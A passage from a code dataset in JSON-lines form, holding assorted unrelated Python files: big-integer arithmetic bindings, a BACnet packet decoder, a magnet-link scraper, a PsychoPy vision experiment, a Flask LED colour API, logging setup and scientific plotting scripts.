gmp.mpz_cmp_ui(self._mpz, other)\n else:\n oth = _new_mpz()\n _pylong_to_mpz(other, oth)\n res = gmp.mpz_cmp(self._mpz, oth)\n _del_mpz(oth)\n elif isinstance(other, float):\n res = gmp.mpz_cmp_d(self._mpz, other)\n else:\n return None\n return res\n\n def __lt__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c < 0\n\n def __gt__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c > 0\n\n def __eq__(self, other):\n c = self.__cmp(other)\n if c is None:\n return NotImplemented\n return c == 0\n\n def __ne__(self, other):\n return not self == other\n\n def __ge__(self, other):\n return not self < other\n\n def __le__(self, other):\n return not self > other\n\n def __int__(self):\n if gmp.mpz_fits_slong_p(self._mpz):\n return gmp.mpz_get_si(self._mpz)\n elif gmp.mpz_fits_ulong_p(self._mpz):\n return gmp.mpz_get_ui(self._mpz)\n else:\n return _mpz_to_pylong(self._mpz)\n\n __index__ = __int__\n\n def __long__(self):\n if gmp.mpz_fits_slong_p(self._mpz):\n return long(gmp.mpz_get_si(self._mpz))\n elif gmp.mpz_fits_ulong_p(self._mpz):\n return gmp.mpz_get_ui(self._mpz)\n else:\n return _mpz_to_pylong(self._mpz)\n\n def __float__(self):\n return gmp.mpz_get_d(self._mpz)\n\n def __complex__(self):\n return float(self) + 0j\n\n def __abs__(self):\n res = _new_mpz()\n gmp.mpz_abs(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __neg__(self):\n res = _new_mpz()\n gmp.mpz_neg(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __pos__(self):\n return self\n\n def __invert__(self):\n res = _new_mpz()\n gmp.mpz_com(res, self._mpz)\n return mpz._from_c_mpz(res)\n\n def __and__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_and(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_and(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __rand__ = __and__\n\n def __or__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_ior(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_ior(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __ror__ = __or__\n\n def __xor__(self, other):\n res = _new_mpz()\n if isinstance(other, (int, long)):\n oth = _new_mpz()\n _pyint_to_mpz(other, oth)\n gmp.mpz_xor(res, self._mpz, oth)\n _del_mpz(oth)\n else:\n gmp.mpz_xor(res, self._mpz, other._mpz)\n\n return mpz._from_c_mpz(res)\n __rxor__ = __xor__\n\n def __nonzero__(self):\n return gmp.mpz_cmp_ui(self._mpz, 0) != 0\n\n __bool__ = __nonzero__\n\n def __pow__(self, power, modulo=None):\n if not isinstance(power, (int, long, mpz)):\n return NotImplemented\n if modulo is not None and not isinstance(modulo, (int, long, mpz)):\n return NotImplemented\n\n if power < 0:\n raise ValueError('mpz.pow with negative exponent')\n\n res = _new_mpz()\n if modulo is None:\n exp = int(power)\n if exp > MAX_UI:\n raise ValueError('mpz.pow with outragous exponent')\n gmp.mpz_pow_ui(res, self._mpz, exp)\n else:\n del_mod = del_exp = False\n if isinstance(modulo, (int, long)):\n mod = _new_mpz()\n _pylong_to_mpz(abs(modulo), mod)\n del_mod = True\n else:\n mod = modulo._mpz\n if isinstance(power, (int, long)) and power <= MAX_UI:\n gmp.mpz_powm_ui(res, self._mpz, power, mod)\n else:\n if isinstance(power, (int, long)):\n exp = _new_mpz()\n _pylong_to_mpz(power, exp)\n del_exp = True\n else:\n exp = power._mpz\n gmp.mpz_powm(res, self._mpz, exp, mod)\n if del_exp:\n _del_mpz(exp)\n if del_mod:\n _del_mpz(mod)\n\n return mpz._from_c_mpz(res)\n\n def __rpow__(self, other):\n if not isinstance(other, (int, long)):\n return NotImplemented\n\n if self < 0:\n raise ValueError('mpz.pow with negative exponent')\n\n res = _new_mpz()\n\n exp = int(self)\n if exp > MAX_UI:\n raise ValueError('mpz.pow with outragous exponent')\n if 0 <= other <= MAX_UI:\n gmp.mpz_ui_pow_ui(res, other, exp)\n else:\n base = _new_mpz()\n _pylong_to_mpz(other, base)\n gmp.mpz_pow_ui(res, base, exp)\n _del_mpz(base)\n\n return mpz._from_c_mpz(res)\n","sub_path":"gmpy_cffi/mpz.py","file_name":"mpz.py","file_ext":"py","file_size_in_byte":14817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"269918770","text":"#!/usr/bin/python\n\n\"\"\"\nThis simple tool decodes a BACnet packet hex string.\n\"\"\"\n\nfrom bacpypes.debugging import bacpypes_debugging, ModuleLogger, xtob\nfrom bacpypes.consolelogging import ArgumentParser\n\nfrom bacpypes.analysis import decode_packet\n\n# some debugging\n_debug = 0\n_log = ModuleLogger(globals())\n\n#\n# __main__\n#\n\n# parse the command line arguments\nparser = ArgumentParser(description=__doc__)\nparser.add_argument(\n \"hexstring\", type=str,\n help=\"hex string to decode\",\n )\nargs = parser.parse_args()\n\nif _debug: _log.debug(\"initialization\")\nif _debug: _log.debug(\" - args: %r\", args)\n\n# assume Ethernet header\ndata = b'\\0' * 14 + xtob(args.hexstring)\n\n# decode the packet\npkt = decode_packet(data)\nif pkt:\n pkt.debug_contents()\n\n","sub_path":"hexdecode.py","file_name":"hexdecode.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"445506442","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy import Item, Field\n\n\nclass Dota2Item(Item):\n team_A = Field()\n team_B = Field()\n odd_A = Field()\n odd_B = Field()\n winner = Field()\n mode = Field()\n score = Field()\n","sub_path":"dota2/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329941891","text":"import sys\nimport string\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom keras.optimizers import SGD\nfrom sklearn.decomposition import PCA\n\nsys.path.insert(0,'./model')\nfrom DEC import DEC, ClusteringLayer\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"--classes\", help=\"number of classes in the model\", default=9)\nparser.add_argument(\"--img_ht\", help=\"image height\", default=100)\nparser.add_argument(\"--img_wdt\", help=\"image width\", default=100)\nparser.add_argument(\"--data_path\", help=\"directory where data is located\", default=\"./data\")\nparser.add_argument(\"--result_path\", help=\"directory where model results are located\", default=\"./model/results\")\n\nargs = parser.parse_args()\n#print(\"CLASSES: \"+str(args.classes))\n\n# DEC constants from DEC paper\nbatch_size = 256\nlr = 0.01\nmomentum = 0.9\ntol = 0.001\nmaxiter = 10\n#update_interval = 140 #perhaps this should be 1 for multitask learning\nupdate_interval = 1 #perhaps this should be 1 for multitask learning\nn_clusters = 9 # number of clusters to use\nn_classes = args.classes # number of classes\nimg_ht = args.img_ht\nimg_wdt = args.img_wdt\ndata_path = args.data_path\ngalaxy_results = args.result_path\n\nlcolours = ['#CAA8F5', '#D6FF79', '#A09BE7', '#5F00BA', '#56CBF9', \\\n '#F3C969', '#ED254E', '#B0FF92', '#D9F0FF','#46351D']\nlcolours = lcolours[0:n_classes]\n\ndef get_cluster_centres(dec):\n return np.squeeze(np.array(dec.model.get_layer(name='clustering').get_weights()))\n\n\ndef load_galaxy(data_path=data_path):\n #label_data = np.load(data_path + \"/rescaled_labels.npy\")\n img_data = np.load(data_path + \"/rescaled_matrix_100.npz\")['arr_0']\n label_data = img_data[:,-1]\n img_data = img_data[:,1:-1]\n #img_data = np.divide(img_data,255.)\n \n print(\"UNIQUE LABELS: \", np.unique(label_data))\n print(label_data.shape)\n print(img_data.shape)\n #img_data = img_data/255.\n\n return img_data,label_data\n\n\ndef pca_plot(base_network, x, cluster_centres=None, y=None, labels=[], output_file=None,\\\n lcolours=[], ulcolour='#747777', ccolour='#4D6CFA', legend=False):\n \n def onpick(event):\n print('picked')\n print(event.ind)\n #print(y[event.ind[0]])\n dim = int(np.ceil(np.sqrt(len(event.ind))))\n print(dim)\n fig = plt.figure()\n for i in range(len(event.ind)):\n ax = fig.add_subplot(dim,dim,i+1)\n ax.imshow(np.reshape(x[event.ind[i]], (img_ht,img_wdt)), cmap='gray_r')\n plt.axis('off')\n plt.show()\n \n pca = PCA(n_components=2)\n x_pca = pca.fit_transform(np.nan_to_num(base_network.predict(x)))\n if cluster_centres is not None:\n c_pca = pca.transform(cluster_centres)\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111)\n ax.scatter(x_pca[np.where(y!=-1),0], x_pca[np.where(y!=-1),1], marker='o', alpha=0, picker=5)\n if np.any(y):\n unique_targets = list(np.unique(y))\n if -1 in unique_targets:\n ax.scatter(x_pca[np.where(y==-1),0], x_pca[np.where(y==-1),1], marker='o', s=15, \\\n color=ulcolour, alpha=0.3)\n unique_targets.remove(-1)\n for l in unique_targets:\n l = int(l)\n ax.scatter(x_pca[np.where(y==l),0], x_pca[np.where(y==l),1], marker='o', s=5, \\\n color=lcolours[l], alpha=1.0, label=labels[l])\n else:\n ax.scatter(x_pca[:,0], x_pca[:,1], marker='o', s=15, \\\n color=ulcolour, alpha=0.1)\n if cluster_centres is not None:\n ax.scatter(c_pca[:,0], c_pca[:,1], marker='o', s=20, color=ccolour, \\\n alpha=1.0, label='cluster centre')\n\n for i,c in enumerate(string.ascii_lowercase[:len(cluster_centres)]):\n ax.text(c_pca[i,0], c_pca[i,1], str(c), size=21, color='k', weight='bold')\n ax.text(c_pca[i,0], c_pca[i,1], str(c), size=20, color='w')\n plt.axis('off')\n if legend:\n plt.legend(ncol=1,loc='upper left')\n if output_file:\n plt.savefig(output_file)\n fig.canvas.mpl_connect('pick_event', onpick)\n plt.show()\n\ndef clickable_analysis(x_test, y_test):\n ae_weights = galaxy_results + '/ae_weights.h5'\n redec = DEC(dims=[x_test.shape[-1], 500, 500, 2000, 10], \\\n n_clusters=n_clusters)\n #redec.initialize_model(optimizer=SGD(lr=lr, momentum=momentum), ae_weights=ae_weights, x=x_test)\n redec.model.load_weights(galaxy_results + '/DEC_model_final.h5')\n #pca_plot(redec.encoder, np.concatenate((x_train, x_train_dev, x_valid)), \\\n # y=np.concatenate((y_train_vote_fractions, y_train_dev_vote_fractions, -1*np.ones(y_valid.shape))), \\\n # cluster_centres=get_cluster_centres(redec), labels=['bogus', 'real'], lcolours=['#D138BF','#7494EA'], \\\n # ulcolour='#A0A4B8', ccolour='#21D19F', legend=False)\n\n pca_plot(redec.encoder, x_test, y=y_test, \\\n cluster_centres=get_cluster_centres(redec), labels=[str(i) for i in range(10)], lcolours=lcolours, \\\n ulcolour='#A0A4B8', ccolour='#21D19F', legend=False)\n\ndef main():\n x, y = load_galaxy()\n # split the data into training, validation and test sets\n #m = x.shape[0]\n #m = m - 20000\n #sample_frac = 0.01 # sampling 1% of the points\n #split = int(sample_frac*m)\n #print(split)\n\n # the training set acts as the sample of data for which we query volunteer classifications.\n # Here the data is sampled uniformly at random from the entire data set, targeting the most densely populated regions\n # of feature space.\n #x_train = x[:split]\n #y_train = y[:split]\n #x_train_dev = x[split:2*split]\n #y_train_dev = y[split:2*split]\n\n #x_valid = x[50000:60000]\n #y_valid = y[50000:60000]\n\n x_test = x[60000:]\n y_test = y[60000:]\n print(x_test.shape)\n\n clickable_analysis(x_test, y_test)\n\nif __name__ == '__main__':\n main()\n","sub_path":"plot_galaxies.py","file_name":"plot_galaxies.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"137238534","text":"#import urllib2 \nimport urllib.request\nimport re\nimport sys\ndef getUrlList(urlPath):\n\tresponse = urllib.request.urlopen(urlPath)\n\thtml = response.read()\n\thtml = html.decode('utf-8')\n\tpattern = re.compile(r'http://www\\.btspread\\.com/magnet/detail/hash/[A-F0-9]+')\n\tpatFind = pattern.search(html)\n\tif (patFind):\n\t\tmatchList = pattern.findall(html)\n\t\treturn matchList\n\treturn None\n\ndef getMagnet(urlPath):\n\tresponse = urllib.request.urlopen(urlPath)\n\thtml = response.read()\n\thtml = html.decode('utf-8')\n\tpattern = re.compile(r'(magnet:\\?xt=urn:btih:[^\"\\']+)\" class=')\n\tpatFind = pattern.search(html)\n\tif (patFind):\n\t\tprint(patFind.group(1) + '\\n')\n\t\treturn patFind.group(1) + '\\n'\n\treturn None\n\ndef getAllMagnet(code):\n\tprint('hello')\n\tList = getUrlList('http://www.btspread.com/search/' + code)\n\tif (List != None):\n\t\tmagList = [None] * len(List)\n\t\tfor i in range(len(List)):\n\t\t\tmagList[i] = getMagnet(List[i])\n\t\tprint('hello')\n\t\tprint(magList)\n\t\treturn magList\n\treturn None\n\n#if (len(sys.argv) == 2):\n#\tgetAllMagnet(sys.argv[1])\n","sub_path":"src/magnet.py","file_name":"magnet.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"168290263","text":"import time\nimport Stepper\n\n\"\"\"\n 1 2 3 4 5 6 7 8\n \nPin1 x x x\nPin2 x x x\nPin3 x x x\nPin4 x x x\n\n\"\"\"\n\nbounds = 10\n\nprint('Init with bounds ' + str(bounds))\nstepper = Stepper.Stepper(bounds)\nprint('Test LEFT_TURN...')\nstepper.LEFT_TURN(9)\ntime.sleep(0.5)\nprint('Test RIGHT_TURN...')\nstepper.RIGHT_TURN(18)\ntime.sleep(0.5)\nprint('Calibrate...')\nstepper.calibrate()\nprint('Test done.')\n","sub_path":"modules/stepmotorTest.py","file_name":"stepmotorTest.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"636901368","text":"def getPizzas(person):\n result_pizzas = []\n while True:\n try:\n input_pizza = input()\n except EOFError:\n break\n if input_pizza == \"\":\n break\n result_pizzas.append(input_pizza)\n\n print(person + \" favorite pizzas are:\")\n\n for pizza in result_pizzas:\n print(pizza)\n \ngetPizzas(\"My\")\ngetPizzas(\"My friends\")","sub_path":"testing/markus.py","file_name":"markus.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498468774","text":"\"\"\"\nLogger\n===========\n\nSetup a logger with two handlers to remove redundancy between logs entries\nOne is a stream handler for any messages to the console. The other is\neither a file handler or a null handler.\n\n\"\"\"\n\nfrom pathlib import Path\nimport yaml\nimport logging\nimport logging.config\nfrom concurrent_log_handler import ConcurrentRotatingFileHandler\n\n# =============================================================================\n# Global Variables\n# =============================================================================\nLEVEL_DICT = {\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.CRITICAL,\n}\n\nLOG_FORMAT = logging.Formatter(\n \"%(asctime)s [line %(lineno)d] %(name)s.%(funcName)s - %(levelname)s: %(message)s\"\n)\n# Get the configuration file path, should be in same directory as this file\nCONF_PATH = Path(__file__).parent\nCONF_FILE = Path.joinpath(CONF_PATH, \"logging_config.yaml\")\n\n# make a folder for the logs to go into.\nLOG_PATH = CONF_PATH.parent.parent.joinpath(\"logs\")\n\nif not LOG_PATH.exists():\n LOG_PATH.mkdir()\n\nif not CONF_FILE.exists():\n CONF_FILE = None\n\n\ndef load_logging_config(config_fn=CONF_FILE):\n \"\"\"\n configure/setup the logging according to the input configfile\n\n :param configfile: .yml, .ini, .conf, .json, .yaml.\n Its default is the logging.yml located in the same dir as this module.\n It can be modofied to use env variables to search for a log config file.\n \"\"\"\n if config_fn:\n config_file = Path(config_fn)\n with open(config_file, \"r\") as fid:\n config_dict = yaml.safe_load(fid)\n\n else:\n config_dict = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"standard\": {\n \"format\": \"%(asctime)s [line %(lineno)d] %(name)s.%(funcName)s - %(levelname)s: %(message)s\",\n \"datefmt\": \"%Y-%m-%dT%H:%M:%S\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"standard\",\n \"stream\": \"ext://sys.stdout\",\n }\n },\n \"loggers\": {\n \"__main__\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"],\n \"propagate\": False,\n }\n },\n \"root\": {\"level\": \"DEBUG\", \"handlers\": [\"console\"], \"propogate\": False},\n }\n\n logging.config.dictConfig(config_dict)\n\n\ndef setup_logger(logger_name, fn=None, level=\"debug\"):\n \"\"\"\n Create a logger, can write to a separate file. This will write to\n the logs folder in the mt_metadata directory.\n\n :param logger_name: name of the logger, typically __name__\n :type logger_name: string\n :param fn: file name to write to, defaults to None\n :type fn: TYPE, optional\n :param level: DESCRIPTION, defaults to \"debug\"\n :type level: TYPE, optional\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n logger = logging.getLogger(logger_name)\n\n # if there is a file name create file in logs directory\n if fn is not None:\n # need to clear the handlers to make sure there is only\n # one call per logger plus stdout\n if logger.hasHandlers():\n logger.handlers.clear()\n\n logger.propagate = False\n # want to add a stream handler for any Info print statements as stdOut\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(LOG_FORMAT)\n stream_handler.setLevel(LEVEL_DICT[\"info\"])\n logger.addHandler(stream_handler)\n\n fn = LOG_PATH.joinpath(fn)\n exists = False\n if fn.exists():\n exists = True\n\n if fn.suffix not in [\".log\"]:\n fn = Path(fn.parent, f\"{fn.stem}.log\")\n\n # fn_handler = logging.FileHandler(fn)\n fn_handler = ConcurrentRotatingFileHandler(fn, maxBytes=2 ** 21, backupCount=2)\n fn_handler.setFormatter(LOG_FORMAT)\n fn_handler.setLevel(LEVEL_DICT[level.lower()])\n logger.addHandler(fn_handler)\n if not exists:\n logger.info(f\"Logging file can be found {logger.handlers[-1].baseFilename}\")\n\n return logger\n","sub_path":"mth5/utils/mth5_logger.py","file_name":"mth5_logger.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"402149588","text":"import sys\nimport os\nimport datetime\nimport time\nimport random\nimport util\nfrom util import defaults\nfrom psychopy import visual, core, event\n\nCOLORS = ['red', 'green', 'yellow']\n\nconfig = {}\nif len(sys.argv) == 2:\n config_file = sys.argv[1]\n if not os.path.exists(config_file):\n sys.exit('config file path %s does not exist'%config_file)\n config = util.load_config(config_file)\n\nparams = defaults.load_params(config)\n\nif not os.path.exists(params['save_location']):\n os.makedirs(params['save_location'])\n\nstart_time = datetime.datetime.now().strftime('%Y%m%d.%H%M%S')\nparams['start_time'] = start_time\n\n# Initialize data file writer\nsave_file_path = os.path.join(params['save_location'], start_time)\nsave_file = open(save_file_path, \"w\")\n\n# Write params\nsave_file.write('params: ' + str(params) + '\\n')\n\n# Set up conditions\nclass condition(object):\n def __init__(self, x, y, color=[1,1,1]):\n self.x = x\n self.y = y\n self.color = color\n\nconditions = []\nfixation_cross_size = params['fixation_cross_size']\nstimulus_radius = params['stimulus_radius']\nmax_x = params['x_size'] - stimulus_radius\nmin_x = -max_x\nmax_y = params['y_size'] - stimulus_radius\nmin_y = -max_y\ngrid_size = params['grid_size']\n\nfor color in COLORS:\n x = min_x\n while x <= (max_x - grid_size):\n y = min_y\n while y <= (max_y - grid_size):\n if not (-fixation_cross_size < x < fixation_cross_size or -fixation_cross_size < y < fixation_cross_size):\n for n in range(params['n_trials_per_location']):\n conditions.append(condition(x, y, color))\n y += grid_size\n x += grid_size\nrandom.shuffle(conditions) # shuffle the conditions\n\n# initialize window\n# TODO: This uses the 'testMonitor' and needs to be fixed!\nwin = visual.Window([params['screen_x'],params['screen_y']], monitor=\"testMonitor\", units=\"deg\", screen=params['screen_number'], rgb=params['screen_rgb'])\nfixation = visual.GratingStim(win, tex=None, mask='cross', sf=0, size=fixation_cross_size,\n name='fixation', autoLog=False)\n\ntrial_number = 0\nnum_conditions = len(conditions)\nfixation = visual.GratingStim(win, tex=None, mask='cross', sf=0, size=1,\n name='fixation', autoLog=False)\nstimulus = visual.Circle(win, radius=stimulus_radius, fillColor='white')\n\nclock = core.Clock()\nquit = False\nwhile trial_number < num_conditions and not quit:\n trial_condition = conditions[trial_number]\n presentation_time = random.choice(params['presentation_time'])\n isi = random.choice(params['isi_ms']) / 1000.\n trial_data = {'trial_num': trial_number,\n 'x': trial_condition.x,\n 'y': trial_condition.y,\n 'color': trial_condition.color,\n 'isi': isi,\n 'presentation_time': presentation_time,\n 'catch_trial': False}\n allKeys = event.waitKeys()\n # Exit if q pushed\n if 'q' in allKeys:\n break\n \n # present fixation\n fixation.draw()\n win.flip()\n\n # wait isi_ms before presenting stimulus\n core.wait(isi)\n\n # present stimulus if not a catch trial\n present_stimulus = True\n if random.random() < params['prob_catch_trial']:\n trial_data['catch_trial'] = True\n present_stimulus = False\n else:\n trial_number += 1 # only increment trial if stimulus presented\n \n stim_start = time.time()\n response = None\n while (time.time() - stim_start) < (presentation_time / 1000.) and response is None:\n fixation.draw()\n if present_stimulus:\n stimulus.setPos([trial_condition.x, trial_condition.y])\n stimulus.lineColor = trial_condition.color\n stimulus.fillColor = trial_condition.color\n stimulus.draw()\n win.flip()\n allKeys = event.getKeys()\n if len(allKeys) > 0:\n if 'j' in allKeys:\n response = 'red'\n elif 'k' in allKeys:\n response = 'blue'\n elif 'l' in allKeys:\n response = 'purple'\n elif 'f' in allKeys:\n response = 'not_seen'\n elif 'q' in allKeys:\n response = 'quit'\n quit = True\n else:\n response = 'invalid'\n event.clearEvents()\n while (time.time() - stim_start) < (params['timeout_ms'] / 1000.) and response is None:\n fixation.draw()\n win.flip()\n allKeys = event.getKeys()\n if len(allKeys) > 0:\n if 'j' in allKeys:\n response = 'red'\n elif 'k' in allKeys:\n response = 'blue'\n elif 'l' in allKeys:\n response = 'purple'\n elif 'f' in allKeys:\n response = 'not_seen'\n elif 'q' in allKeys:\n response = 'quit'\n quit = True\n else:\n response = 'invalid'\n event.clearEvents()\n print('\\a')\n fixation.draw()\n win.flip()\n trial_data['response'] = response if response is not None else 'TIMEOUT'\n event.clearEvents()\n save_file.write(str(trial_data) + '\\n')\n\nsave_file.close()\n\n","sub_path":"deprecated/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157222153","text":"import json\nimport os\nimport sys\n\nfrom flask import Flask, Response, render_template, request, redirect, url_for\nimport sender\nimport color\n\napp = Flask(__name__)\nqueue = sender.start_sender()\n\n\ndef set_rgb_time(r, g, b, time):\n c = color.Color(r, g, b, time)\n queue.send(c)\n return json.dumps([c.red, c.green, c.blue])\n\n\n@app.route('/api/r//g//b/')\ndef api_rgb(r, g, b):\n return set_rgb_time(r, g, b, 0)\n\n\n@app.route('/api/r//g//b//time/')\ndef api_rgb_time(r, g, b, time):\n return set_rgb_time(r, g, b, time)\n\n\n@app.route('/api/list')\ndef api_list():\n json_list = []\n for col in queue.list_queue():\n json_list.append({\n 'rgb': [col.red, col.green, col.blue],\n 'time': col.time\n })\n return Response(json.dumps(json_list), mimetype='application/json')\n\n\n@app.route('/sysinfo')\ndef sysinfo():\n uname = os.uname()\n sysinfo_all = {\n 'OS': uname[0],\n 'Host': uname[1],\n 'Version': uname[2],\n 'Description': uname[3],\n 'Arch': uname[4]\n }\n return render_template('sysinfo_all.html', pyversion=sys.version,\n sysinfo=sysinfo_all, show_version=True)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef root():\n if request.method == 'POST':\n try:\n red = int(request.form['red'])\n green = int(request.form['green'])\n blue = int(request.form['blue'])\n queue.send(color.Color(red, green, blue))\n except:\n print('Some error happened - Redirecting.')\n finally:\n return redirect(url_for('root'))\n else:\n return '''

\n

R:

\n

G:

\n

B:

\n

\n
'''\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n","sub_path":"scripts/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"336738020","text":"\n\ndef get_title_verifikasi(request, pengajuan_obj, skizin_obj):\n\ttitle_verifikasi = \"\"\n\tif request.user.groups.filter(name=\"Operator\"):\n\t\tif pengajuan_obj.status == 11 or pengajuan_obj.status == 6 or pengajuan_obj.status == 4:\n\t\t\ttitle_verifikasi = \"Validasi Persyaratan\"\n\tif request.user.groups.filter(name=\"Kabid\"):\n\t\tif pengajuan_obj.status == 2:\n\t\t\tif skizin_obj:\n\t\t\t\tif skizin_obj.status == 6 or skizin_obj.status == 4:\n\t\t\t\t\ttitle_verifikasi = \"Verifikasi Draf Izin Kabid\"\n\t\telif pengajuan_obj.status == 4:\n\t\t\ttitle_verifikasi = \"Verifikasi Kabid Pelayanan Perizinan\"\n\tif request.user.groups.filter(name=\"Pembuat Surat\"):\n\t\tif skizin_obj == None and pengajuan_obj.status == 2:\n\t\t\ttitle_verifikasi = \"Pembuatan Draft SKIzin\"\n\tif request.user.groups.filter(name=\"Kadin\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 4 or skizin_obj.status == 9:\n\t\t\ttitle_verifikasi = \"Verifikasi Draf Izin Kadin\"\n\tif request.user.groups.filter(name=\"Penomoran\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 9 or skizin_obj.status == 10:\n\t\t\ttitle_verifikasi = \"Registrasi Izin (Penomoran Izin)\"\n\tif request.user.groups.filter(name=\"Cetak\"):\n\t\tif pengajuan_obj.status == 2:\n\t\t\tif skizin_obj:\n\t\t\t\tif skizin_obj.status == 6 or skizin_obj.status == 4:\n\t\t\t\t\ttitle_verifikasi = \"Cetak Izin\"\n\tif request.user.groups.filter(name=\"Selesai\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 2:\n\t\t\ttitle_verifikasi = \"Stample SK Izin\"\n\t\telif pengajuan_obj.status == 1 and skizin_obj.status == 1:\n\t\t\ttitle_verifikasi = \"Pengajuan Selesai\"\n\treturn title_verifikasi\n\ndef send_email_html(emailto, subject, objects_, template_):\n from django.core.mail import EmailMessage\n from django.conf import settings\n from django.template import Context, Template\n from django.template.loader import get_template\n from django.template.loader import render_to_string\n\n html_content = render_to_string(template_, {'obj': objects_})\n \n email = EmailMessage(subject, html_content, settings.DEFAULT_FROM_EMAIL, [emailto])\n email.content_subtype = \"html\"\n res = email.send()\n\n return res","sub_path":"izin_dinkes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"136197123","text":"import MySQLdb\nimport unittest\n\n\n# All TABLES in the database Schema\nexpected_table_names = [\"auth_group\",\n \"auth_group_permissions\",\n \"auth_permission\",\n \"auth_user\",\n \"auth_user_groups\",\n \"auth_user_user_permissions\",\n \"autoreduce_webapp_cache\",\n \"autoreduce_webapp_experimentcache\",\n \"autoreduce_webapp_instrumentcache\",\n \"autoreduce_webapp_usercache\",\n \"django_admin_log\",\n \"django_content_type\",\n \"django_migrations\",\n \"django_session\",\n \"reduction_variables_instrumentvariable\",\n \"reduction_variables_runvariable\",\n \"reduction_variables_variable\",\n \"reduction_viewer_datalocation\",\n \"reduction_viewer_experiment\",\n \"reduction_viewer_instrument\",\n \"reduction_viewer_notification\",\n \"reduction_viewer_reductionlocation\",\n \"reduction_viewer_reductionrun\",\n \"reduction_viewer_setting\",\n \"reduction_viewer_status\"]\n\n\nclass TestDatabaseGeneration(unittest.TestCase):\n\n def test_localhost_db_construction(self):\n \"\"\"\n Test that the local host database on travis is correctly\n generated from the .sql construction files\n \"\"\"\n db = MySQLdb.connect(host=\"localhost\",\n user=\"test-user\",\n passwd=\"pass\",\n db=\"autoreduction\")\n\n cur = db.cursor()\n cur.execute(\"SHOW TABLES\")\n for row in cur.fetchall():\n self.assertTrue(row[0] in expected_table_names, (\"%s was not found in expected TABLE names\" % row[0]))\n\n db.close()\n","sub_path":"Scripts/Build/test/test_db_generation.py","file_name":"test_db_generation.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"390705541","text":"from netCDF4 import Dataset as ds\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom files_n_vars import *\n\ndef avgDataFilesLatLon(filedir, var, num_files, filetype, unit_conv, depth, avg_coord):\n results = glob('{0}/*{1}*'.format(filedir, filetype))\n arr_tot = np.zeros((46,72))\n for filename in results:\n nc_i = ds(filename, 'r+', format='NETCDF4')\n\n if filetype == 'aijpc':\n area_arr = nc_i['axyp'][:]\n elif filetype == 'oijlpc':\n area_arr = nc_i['oxyp3'][:][depth]\n\n if depth == None:\n arr = nc_i[var][:]\n else:\n arr = nc_i[var][:][depth]\n\n arr_tot = arr_tot + arr\n\n arr_avg = (arr_tot * unit_conv) / num_files\n if len(arr_avg.shape) == 3:\n raise(ValueError, \"This array is 3D, so the axes you are averaging over are invalid.\")\n if 'aqua' in filedir:\n arr_avg = np.roll(arr_avg, (arr_avg.shape[1]) // 2, axis=1)\n if avg_coord == 'lat':\n avg_axis = 1\n elif avg_coord == 'lon':\n 